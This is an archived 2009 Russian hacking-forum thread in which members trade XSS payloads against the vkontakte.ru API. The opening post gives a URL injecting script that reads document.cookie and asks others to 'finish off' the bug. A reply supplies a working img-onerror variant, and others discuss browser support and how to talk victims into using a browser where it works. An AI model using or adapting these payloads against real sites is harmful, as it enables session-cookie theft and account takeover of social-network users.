ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > SЕО/Финансовые задачи/Социальные сети > Социальные сети
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Active xss vkontakte.ru
  #1  
Старый 27.05.2009, 05:44
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию Active xss vkontakte.ru

http://api.vkontakte.ru/api.php?v=2.0&sig=%3Cscript%3Ealert(document.cooki e)%3C/script%3E&format=JSON&api_id=517649&method=getAppF riends

Добейте
 
Ответить с цитированием

  #2  
Старый 27.05.2009, 08:31
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию

Ты уверен, что это активка? =\
И в опере не катит =\
 
Ответить с цитированием

  #3  
Старый 27.05.2009, 08:40
Rebit
Участник форума
Регистрация: 07.08.2007
Сообщений: 136
Провел на форуме:
2010588

Репутация: 653
Отправить сообщение для Rebit с помощью ICQ
По умолчанию

Да в Опере не пашет и в Internet Explorer тоже
 
Ответить с цитированием

  #4  
Старый 27.05.2009, 09:22
vp$
Участник форума
Регистрация: 22.10.2007
Сообщений: 138
Провел на форуме:
2454040

Репутация: 177
Отправить сообщение для vp$ с помощью ICQ
По умолчанию

слэш в закрывающем тэге экранируется, а так бы сработало
 
Ответить с цитированием

  #5  
Старый 27.05.2009, 10:10
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию

Изя лох это пассивка,

http://api.vkontakte.ru/api.php?v=2.0&sig=<img+src=.+onerror=alert()>&form at=JSON&api_id=517649&method=getAppFriends
 
Ответить с цитированием

  #6  
Старый 27.05.2009, 10:20
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


Отправить сообщение для wildshaman с помощью ICQ
По умолчанию

А изя промазнулся, а изя проманхнулся
 
Ответить с цитированием

  #7  
Старый 27.05.2009, 10:21
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


Отправить сообщение для wildshaman с помощью ICQ
По умолчанию

мб перенесете в приват? А то щас же школья набежит тут, а чо, а кто, а зачем это и т д...
 
Ответить с цитированием

  #8  
Старый 27.05.2009, 10:57
Sin3v
Участник форума
Регистрация: 16.07.2008
Сообщений: 159
Провел на форуме:
1063538

Репутация: 240
Отправить сообщение для Sin3v с помощью ICQ
По умолчанию

Ха токо в IE пашет и это пассивка, нафиг она, все щас сидят на мозиле и опере. Так уж при впаривании надо говорить зайди через такой браузер иначе страница не загрузится.

Я две нашел в более легких условиях и где досих пор пашет))
 
Ответить с цитированием

  #9  
Старый 27.05.2009, 11:11
brain[pillow]
Участник форума
Регистрация: 07.11.2008
Сообщений: 124
Провел на форуме:
1483379

Репутация: 386
Отправить сообщение для brain[pillow] с помощью ICQ
По умолчанию

Это пассивка и пашет она под все браузеры
 
Ответить с цитированием

  #10  
Старый 27.05.2009, 11:31
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


Отправить сообщение для wildshaman с помощью ICQ
По умолчанию

Цитата:
Сообщение от Sin3v  
Ха токо в IE пашет и это пассивка, нафиг она, все щас сидят на мозиле и опере. Так уж при впаривании надо говорить зайди через такой браузер иначе страница не загрузится.

Я две нашел в более легких условиях и где досих пор пашет))
dj всех браузерах работает
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Irokez Blog BLIND SQL-INJECTION, INCLUDE, ACTIVE XSS Corwin Сценарии/CMF/СMS 1 19.09.2009 14:01
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25
Active XSS in Invision Power Board 2.1.4 k00p3r Уязвимости 8 03.03.2006 20:51
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ